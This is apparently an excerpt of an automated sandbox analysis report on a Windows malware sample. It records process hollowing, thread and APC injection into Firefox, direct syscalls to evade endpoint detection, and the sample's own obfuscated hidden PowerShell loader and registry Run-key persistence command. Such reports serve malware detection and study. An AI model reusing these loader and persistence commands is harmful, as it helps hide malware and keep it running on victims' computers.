Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CD8BF0 mov eax, dword ptr fs:[00000030h] 7_2_22CD8BF0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CD8BF0 mov eax, dword ptr fs:[00000030h] 7_2_22CD8BF0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D84BB0 mov eax, dword ptr fs:[00000030h] 7_2_22D84BB0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D84BB0 mov eax, dword ptr fs:[00000030h] 7_2_22D84BB0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CE0BBE mov eax, dword ptr fs:[00000030h] 7_2_22CE0BBE
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CE0BBE mov eax, dword ptr fs:[00000030h] 7_2_22CE0BBE
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D7EB50 mov eax, dword ptr fs:[00000030h] 7_2_22D7EB50
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22DA2B57 mov eax, dword ptr fs:[00000030h] 7_2_22DA2B57
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22DA2B57 mov eax, dword ptr fs:[00000030h] 7_2_22DA2B57
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22DA2B57 mov eax, dword ptr fs:[00000030h] 7_2_22DA2B57
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22DA2B57 mov eax, dword ptr fs:[00000030h] 7_2_22DA2B57
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D84B4B mov eax, dword ptr fs:[00000030h] 7_2_22D84B4B
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D84B4B mov eax, dword ptr fs:[00000030h] 7_2_22D84B4B
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D78B42 mov eax, dword ptr fs:[00000030h] 7_2_22D78B42
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D66B40 mov eax, dword ptr fs:[00000030h] 7_2_22D66B40
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D66B40 mov eax, dword ptr fs:[00000030h] 7_2_22D66B40
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D9AB40 mov eax, dword ptr fs:[00000030h] 7_2_22D9AB40
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CC8B50 mov eax, dword ptr fs:[00000030h] 7_2_22CC8B50
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CCCB7E mov eax, dword ptr fs:[00000030h] 7_2_22CCCB7E
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D4EB1D mov eax, dword ptr fs:[00000030h] 7_2_22D4EB1D
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D4EB1D mov eax, dword ptr fs:[00000030h] 7_2_22D4EB1D
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D4EB1D mov eax, dword ptr fs:[00000030h] 7_2_22D4EB1D
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D4EB1D mov eax, dword ptr fs:[00000030h] 7_2_22D4EB1D
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D4EB1D mov eax, dword ptr fs:[00000030h] 7_2_22D4EB1D
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D4EB1D mov eax, dword ptr fs:[00000030h] 7_2_22D4EB1D
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D4EB1D mov eax, dword ptr fs:[00000030h] 7_2_22D4EB1D
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D4EB1D mov eax, dword ptr fs:[00000030h] 7_2_22D4EB1D
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D4EB1D mov eax, dword ptr fs:[00000030h] 7_2_22D4EB1D
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22DA4B00 mov eax, dword ptr fs:[00000030h] 7_2_22DA4B00
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CFEB20 mov eax, dword ptr fs:[00000030h] 7_2_22CFEB20
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CFEB20 mov eax, dword ptr fs:[00000030h] 7_2_22CFEB20
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D98B28 mov eax, dword ptr fs:[00000030h] 7_2_22D98B28
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D98B28 mov eax, dword ptr fs:[00000030h] 7_2_22D98B28
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CFE8C0 mov eax, dword ptr fs:[00000030h] 7_2_22CFE8C0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22DA08C0 mov eax, dword ptr fs:[00000030h] 7_2_22DA08C0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D0C8F9 mov eax, dword ptr fs:[00000030h] 7_2_22D0C8F9
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D0C8F9 mov eax, dword ptr fs:[00000030h] 7_2_22D0C8F9
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D9A8E4 mov eax, dword ptr fs:[00000030h] 7_2_22D9A8E4
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D5C89D mov eax, dword ptr fs:[00000030h] 7_2_22D5C89D
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CD0887 mov eax, dword ptr fs:[00000030h] 7_2_22CD0887
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D00854 mov eax, dword ptr fs:[00000030h] 7_2_22D00854
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CE2840 mov ecx, dword ptr fs:[00000030h] 7_2_22CE2840
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CD4859 mov eax, dword ptr fs:[00000030h] 7_2_22CD4859
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CD4859 mov eax, dword ptr fs:[00000030h] 7_2_22CD4859
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D66870 mov eax, dword ptr fs:[00000030h] 7_2_22D66870
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D66870 mov eax, dword ptr fs:[00000030h] 7_2_22D66870
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D5E872 mov eax, dword ptr fs:[00000030h] 7_2_22D5E872
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D5E872 mov eax, dword ptr fs:[00000030h] 7_2_22D5E872
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D5C810 mov eax, dword ptr fs:[00000030h] 7_2_22D5C810
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D0A830 mov eax, dword ptr fs:[00000030h] 7_2_22D0A830
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D7483A mov eax, dword ptr fs:[00000030h] 7_2_22D7483A
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D7483A mov eax, dword ptr fs:[00000030h] 7_2_22D7483A
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CF2835 mov eax, dword ptr fs:[00000030h] 7_2_22CF2835
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CF2835 mov eax, dword ptr fs:[00000030h] 7_2_22CF2835
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CF2835 mov eax, dword ptr fs:[00000030h] 7_2_22CF2835
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CF2835 mov ecx, dword ptr fs:[00000030h] 7_2_22CF2835
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CF2835 mov eax, dword ptr fs:[00000030h] 7_2_22CF2835
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CF2835 mov eax, dword ptr fs:[00000030h] 7_2_22CF2835
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D049D0 mov eax, dword ptr fs:[00000030h] 7_2_22D049D0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D9A9D3 mov eax, dword ptr fs:[00000030h] 7_2_22D9A9D3
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D669C0 mov eax, dword ptr fs:[00000030h] 7_2_22D669C0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CDA9D0 mov eax, dword ptr fs:[00000030h] 7_2_22CDA9D0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CDA9D0 mov eax, dword ptr fs:[00000030h] 7_2_22CDA9D0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CDA9D0 mov eax, dword ptr fs:[00000030h] 7_2_22CDA9D0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CDA9D0 mov eax, dword ptr fs:[00000030h] 7_2_22CDA9D0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CDA9D0 mov eax, dword ptr fs:[00000030h] 7_2_22CDA9D0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CDA9D0 mov eax, dword ptr fs:[00000030h] 7_2_22CDA9D0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D029F9 mov eax, dword ptr fs:[00000030h] 7_2_22D029F9
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D029F9 mov eax, dword ptr fs:[00000030h] 7_2_22D029F9
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D5E9E0 mov eax, dword ptr fs:[00000030h] 7_2_22D5E9E0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CD09AD mov eax, dword ptr fs:[00000030h] 7_2_22CD09AD
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CD09AD mov eax, dword ptr fs:[00000030h] 7_2_22CD09AD
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D589B3 mov esi, dword ptr fs:[00000030h] 7_2_22D589B3
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D589B3 mov eax, dword ptr fs:[00000030h] 7_2_22D589B3
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D589B3 mov eax, dword ptr fs:[00000030h] 7_2_22D589B3
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CE29A0 mov eax, dword ptr fs:[00000030h] 7_2_22CE29A0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CE29A0 mov eax, dword ptr fs:[00000030h] 7_2_22CE29A0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CE29A0 mov eax, dword ptr fs:[00000030h] 7_2_22CE29A0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CE29A0 mov eax, dword ptr fs:[00000030h] 7_2_22CE29A0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CE29A0 mov eax, dword ptr fs:[00000030h] 7_2_22CE29A0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CE29A0 mov eax, dword ptr fs:[00000030h] 7_2_22CE29A0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CE29A0 mov eax, dword ptr fs:[00000030h] 7_2_22CE29A0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CE29A0 mov eax, dword ptr fs:[00000030h] 7_2_22CE29A0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CE29A0 mov eax, dword ptr fs:[00000030h] 7_2_22CE29A0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CE29A0 mov eax, dword ptr fs:[00000030h] 7_2_22CE29A0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CE29A0 mov eax, dword ptr fs:[00000030h] 7_2_22CE29A0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CE29A0 mov eax, dword ptr fs:[00000030h] 7_2_22CE29A0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CE29A0 mov eax, dword ptr fs:[00000030h] 7_2_22CE29A0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D50946 mov eax, dword ptr fs:[00000030h] 7_2_22D50946
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22DA4940 mov eax, dword ptr fs:[00000030h] 7_2_22DA4940
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D5C97C mov eax, dword ptr fs:[00000030h] 7_2_22D5C97C
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CF6962 mov eax, dword ptr fs:[00000030h] 7_2_22CF6962
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CF6962 mov eax, dword ptr fs:[00000030h] 7_2_22CF6962
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CF6962 mov eax, dword ptr fs:[00000030h] 7_2_22CF6962
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D74978 mov eax, dword ptr fs:[00000030h] 7_2_22D74978
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D74978 mov eax, dword ptr fs:[00000030h] 7_2_22D74978
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D1096E mov eax, dword ptr fs:[00000030h] 7_2_22D1096E
Enables debug privileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Found direct / indirect Syscall (likely to bypass EDR)
Source: C:\Program Files (x86)\dbeDhFKZVkMkDAmDTCclLrnzshLJQOeuxndUzTwfzuPIpzbHir\KQSYShJeqULXnPcQsI.exe NtWriteVirtualMemory: Direct from: 0x76F0490C Jump to behavior
Source: C:\Program Files (x86)\dbeDhFKZVkMkDAmDTCclLrnzshLJQOeuxndUzTwfzuPIpzbHir\KQSYShJeqULXnPcQsI.exe NtOpenKeyEx: Direct from: 0x76F03C9C Jump to behavior
Source: C:\Program Files (x86)\dbeDhFKZVkMkDAmDTCclLrnzshLJQOeuxndUzTwfzuPIpzbHir\KQSYShJeqULXnPcQsI.exe NtClose: Direct from: 0x76F02B6C
Source: C:\Program Files (x86)\dbeDhFKZVkMkDAmDTCclLrnzshLJQOeuxndUzTwfzuPIpzbHir\KQSYShJeqULXnPcQsI.exe NtReadVirtualMemory: Direct from: 0x76F02E8C Jump to behavior
Source: C:\Program Files (x86)\dbeDhFKZVkMkDAmDTCclLrnzshLJQOeuxndUzTwfzuPIpzbHir\KQSYShJeqULXnPcQsI.exe NtCreateKey: Direct from: 0x76F02C6C Jump to behavior
Source: C:\Program Files (x86)\dbeDhFKZVkMkDAmDTCclLrnzshLJQOeuxndUzTwfzuPIpzbHir\KQSYShJeqULXnPcQsI.exe NtSetInformationThread: Direct from: 0x76F02B4C Jump to behavior
Source: C:\Program Files (x86)\dbeDhFKZVkMkDAmDTCclLrnzshLJQOeuxndUzTwfzuPIpzbHir\KQSYShJeqULXnPcQsI.exe NtQueryAttributesFile: Direct from: 0x76F02E6C Jump to behavior
Source: C:\Program Files (x86)\dbeDhFKZVkMkDAmDTCclLrnzshLJQOeuxndUzTwfzuPIpzbHir\KQSYShJeqULXnPcQsI.exe NtAllocateVirtualMemory: Direct from: 0x76F048EC Jump to behavior
Source: C:\Program Files (x86)\dbeDhFKZVkMkDAmDTCclLrnzshLJQOeuxndUzTwfzuPIpzbHir\KQSYShJeqULXnPcQsI.exe NtQuerySystemInformation: Direct from: 0x76F048CC Jump to behavior
Source: C:\Program Files (x86)\dbeDhFKZVkMkDAmDTCclLrnzshLJQOeuxndUzTwfzuPIpzbHir\KQSYShJeqULXnPcQsI.exe NtQueryVolumeInformationFile: Direct from: 0x76F02F2C Jump to behavior
Source: C:\Program Files (x86)\dbeDhFKZVkMkDAmDTCclLrnzshLJQOeuxndUzTwfzuPIpzbHir\KQSYShJeqULXnPcQsI.exe NtOpenSection: Direct from: 0x76F02E0C Jump to behavior
Source: C:\Program Files (x86)\dbeDhFKZVkMkDAmDTCclLrnzshLJQOeuxndUzTwfzuPIpzbHir\KQSYShJeqULXnPcQsI.exe NtSetInformationThread: Direct from: 0x76EF63F9 Jump to behavior
Source: C:\Program Files (x86)\dbeDhFKZVkMkDAmDTCclLrnzshLJQOeuxndUzTwfzuPIpzbHir\KQSYShJeqULXnPcQsI.exe NtDeviceIoControlFile: Direct from: 0x76F02AEC Jump to behavior
Source: C:\Program Files (x86)\dbeDhFKZVkMkDAmDTCclLrnzshLJQOeuxndUzTwfzuPIpzbHir\KQSYShJeqULXnPcQsI.exe NtQueryValueKey: Direct from: 0x76F02BEC Jump to behavior
Source: C:\Program Files (x86)\dbeDhFKZVkMkDAmDTCclLrnzshLJQOeuxndUzTwfzuPIpzbHir\KQSYShJeqULXnPcQsI.exe NtCreateFile: Direct from: 0x76F02FEC Jump to behavior
Source: C:\Program Files (x86)\dbeDhFKZVkMkDAmDTCclLrnzshLJQOeuxndUzTwfzuPIpzbHir\KQSYShJeqULXnPcQsI.exe NtOpenFile: Direct from: 0x76F02DCC Jump to behavior
Source: C:\Program Files (x86)\dbeDhFKZVkMkDAmDTCclLrnzshLJQOeuxndUzTwfzuPIpzbHir\KQSYShJeqULXnPcQsI.exe NtQueryInformationToken: Direct from: 0x76F02CAC Jump to behavior
Source: C:\Program Files (x86)\dbeDhFKZVkMkDAmDTCclLrnzshLJQOeuxndUzTwfzuPIpzbHir\KQSYShJeqULXnPcQsI.exe NtProtectVirtualMemory: Direct from: 0x76EF7B2E Jump to behavior
Source: C:\Program Files (x86)\dbeDhFKZVkMkDAmDTCclLrnzshLJQOeuxndUzTwfzuPIpzbHir\KQSYShJeqULXnPcQsI.exe NtOpenKeyEx: Direct from: 0x76F02B9C Jump to behavior
Source: C:\Program Files (x86)\dbeDhFKZVkMkDAmDTCclLrnzshLJQOeuxndUzTwfzuPIpzbHir\KQSYShJeqULXnPcQsI.exe NtProtectVirtualMemory: Direct from: 0x76F02F9C Jump to behavior
Source: C:\Program Files (x86)\dbeDhFKZVkMkDAmDTCclLrnzshLJQOeuxndUzTwfzuPIpzbHir\KQSYShJeqULXnPcQsI.exe NtSetInformationProcess: Direct from: 0x76F02C5C Jump to behavior
Source: C:\Program Files (x86)\dbeDhFKZVkMkDAmDTCclLrnzshLJQOeuxndUzTwfzuPIpzbHir\KQSYShJeqULXnPcQsI.exe NtNotifyChangeKey: Direct from: 0x76F03C2C Jump to behavior
Source: C:\Program Files (x86)\dbeDhFKZVkMkDAmDTCclLrnzshLJQOeuxndUzTwfzuPIpzbHir\KQSYShJeqULXnPcQsI.exe NtCreateMutant: Direct from: 0x76F035CC Jump to behavior
Source: C:\Program Files (x86)\dbeDhFKZVkMkDAmDTCclLrnzshLJQOeuxndUzTwfzuPIpzbHir\KQSYShJeqULXnPcQsI.exe NtWriteVirtualMemory: Direct from: 0x76F02E3C Jump to behavior
Source: C:\Program Files (x86)\dbeDhFKZVkMkDAmDTCclLrnzshLJQOeuxndUzTwfzuPIpzbHir\KQSYShJeqULXnPcQsI.exe NtMapViewOfSection: Direct from: 0x76F02D1C Jump to behavior
Source: C:\Program Files (x86)\dbeDhFKZVkMkDAmDTCclLrnzshLJQOeuxndUzTwfzuPIpzbHir\KQSYShJeqULXnPcQsI.exe NtResumeThread: Direct from: 0x76F036AC Jump to behavior
Source: C:\Program Files (x86)\dbeDhFKZVkMkDAmDTCclLrnzshLJQOeuxndUzTwfzuPIpzbHir\KQSYShJeqULXnPcQsI.exe NtAllocateVirtualMemory: Direct from: 0x76F02BFC Jump to behavior
Source: C:\Program Files (x86)\dbeDhFKZVkMkDAmDTCclLrnzshLJQOeuxndUzTwfzuPIpzbHir\KQSYShJeqULXnPcQsI.exe NtReadFile: Direct from: 0x76F02ADC Jump to behavior
Source: C:\Program Files (x86)\dbeDhFKZVkMkDAmDTCclLrnzshLJQOeuxndUzTwfzuPIpzbHir\KQSYShJeqULXnPcQsI.exe NtQuerySystemInformation: Direct from: 0x76F02DFC Jump to behavior
Source: C:\Program Files (x86)\dbeDhFKZVkMkDAmDTCclLrnzshLJQOeuxndUzTwfzuPIpzbHir\KQSYShJeqULXnPcQsI.exe NtDelayExecution: Direct from: 0x76F02DDC Jump to behavior
Source: C:\Program Files (x86)\dbeDhFKZVkMkDAmDTCclLrnzshLJQOeuxndUzTwfzuPIpzbHir\KQSYShJeqULXnPcQsI.exe NtQueryInformationProcess: Direct from: 0x76F02C26 Jump to behavior
Source: C:\Program Files (x86)\dbeDhFKZVkMkDAmDTCclLrnzshLJQOeuxndUzTwfzuPIpzbHir\KQSYShJeqULXnPcQsI.exe NtResumeThread: Direct from: 0x76F02FBC Jump to behavior
Source: C:\Program Files (x86)\dbeDhFKZVkMkDAmDTCclLrnzshLJQOeuxndUzTwfzuPIpzbHir\KQSYShJeqULXnPcQsI.exe NtCreateUserProcess: Direct from: 0x76F0371C Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Section loaded: NULL target: C:\Program Files (x86)\dbeDhFKZVkMkDAmDTCclLrnzshLJQOeuxndUzTwfzuPIpzbHir\KQSYShJeqULXnPcQsI.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Section loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: NULL target: C:\Program Files (x86)\dbeDhFKZVkMkDAmDTCclLrnzshLJQOeuxndUzTwfzuPIpzbHir\KQSYShJeqULXnPcQsI.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: NULL target: C:\Program Files (x86)\dbeDhFKZVkMkDAmDTCclLrnzshLJQOeuxndUzTwfzuPIpzbHir\KQSYShJeqULXnPcQsI.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\SysWOW64\cmd.exe Thread register set: target process: 2640 Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Windows\SysWOW64\cmd.exe Thread APC queued: target process: C:\Program Files (x86)\dbeDhFKZVkMkDAmDTCclLrnzshLJQOeuxndUzTwfzuPIpzbHir\KQSYShJeqULXnPcQsI.exe Jump to behavior
Sample uses process hollowing technique
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section unmapped: C:\Users\user\AppData\Local\Temp\Kanels.exe base address: 400000 Jump to behavior
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Users\user\AppData\Local\Temp\Kanels.exe base: 1660000 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Users\user\AppData\Local\Temp\Kanels.exe base: 19FFF4 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\16042024124521.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Delkrederekontoer=Get-Content 'C:\Users\user\AppData\Local\Temp\sammentrkkenes\petrochemical\pakken\Abstinerende\Sensorernes\Belgier\Vildnisernes.Tom61';$Rabarberkompots=$Delkrederekontoer.SubString(42536,3);.$Rabarberkompots($Delkrederekontoer)" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\Kanels.exe "C:\Users\user\AppData\Local\Temp\Kanels.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Slavocracy" /t REG_EXPAND_SZ /d "%Sciurids% -windowstyle minimized $Miscomfort=(Get-ItemProperty -Path 'HKCU:\Massakrerede\').Apodyteria;%Sciurids% ($Miscomfort)" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Slavocracy" /t REG_EXPAND_SZ /d "%Sciurids% -windowstyle minimized $Miscomfort=(Get-ItemProperty -Path 'HKCU:\Massakrerede\').Apodyteria;%Sciurids% ($Miscomfort)" Jump to behavior
Source: C:\Program Files (x86)\dbeDhFKZVkMkDAmDTCclLrnzshLJQOeuxndUzTwfzuPIpzbHir\KQSYShJeqULXnPcQsI.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Users\user\Desktop\16042024124521.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$delkrederekontoer=get-content 'c:\users\user\appdata\local\temp\sammentrkkenes\petrochemical\pakken\abstinerende\sensorernes\belgier\vildnisernes.tom61';$rabarberkompots=$delkrederekontoer.substring(42536,3);.$rabarberkompots($delkrederekontoer)"
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "slavocracy" /t reg_expand_sz /d "%sciurids% -windowstyle minimized $miscomfort=(get-itemproperty -path 'hkcu:\massakrerede\').apodyteria;%sciurids% ($miscomfort)"
Source: C:\Users\user\Desktop\16042024124521.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$delkrederekontoer=get-content 'c:\users\user\appdata\local\temp\sammentrkkenes\petrochemical\pakken\abstinerende\sensorernes\belgier\vildnisernes.tom61';$rabarberkompots=$delkrederekontoer.substring(42536,3);.$rabarberkompots($delkrederekontoer)" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "slavocracy" /t reg_expand_sz /d "%sciurids% -windowstyle minimized $miscomfort=(get-itemproperty -path 'hkcu:\massakrerede\').apodyteria;%sciurids% ($miscomfort)" Jump to behavior
Source: C:\Users\user\Desktop\16042024124521.exe Code function: 0_2_1000111A GetModuleFileNameW,GlobalAlloc,CharPrevW,GlobalFree,GetTempFileNameW,CopyFileW,CreateFileW,CreateFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle,lstrcatW,lstrlenW,GlobalAlloc,FindWindowExW,FindWindowExW,FindWindowExW,lstrcmpiW,DeleteFileW,GetVersion,GlobalAlloc,GlobalLock,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreatePipe,CreatePipe,CreatePipe,GetStartupInfoW,CreateProcessW,GetTickCount,PeekNamedPipe,GetTickCount,ReadFile,lstrlenW,lstrlenW,lstrlenW,lstrcpynW,lstrlenW,GlobalSize,GlobalUnlock,GlobalReAlloc,GlobalLock,lstrcatW,GlobalSize,lstrlenW,lstrcpyW,CharNextW,GetTickCount,TerminateProcess,lstrcpyW,Sleep,WaitForSingleObject,GetExitCodeProcess,PeekNamedPipe,lstrcpyW,lstrcpyW,wsprintfW,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,DeleteFileW,GlobalFree,GlobalFree,GlobalUnlock,GlobalFree, 0_2_1000111A
Source: KQSYShJeqULXnPcQsI.exe, 0000000B.00000000.2400186511.0000000001891000.00000002.00000001.00040000.00000000.sdmp, KQSYShJeqULXnPcQsI.exe, 0000000B.00000002.2878268632.0000000001890000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
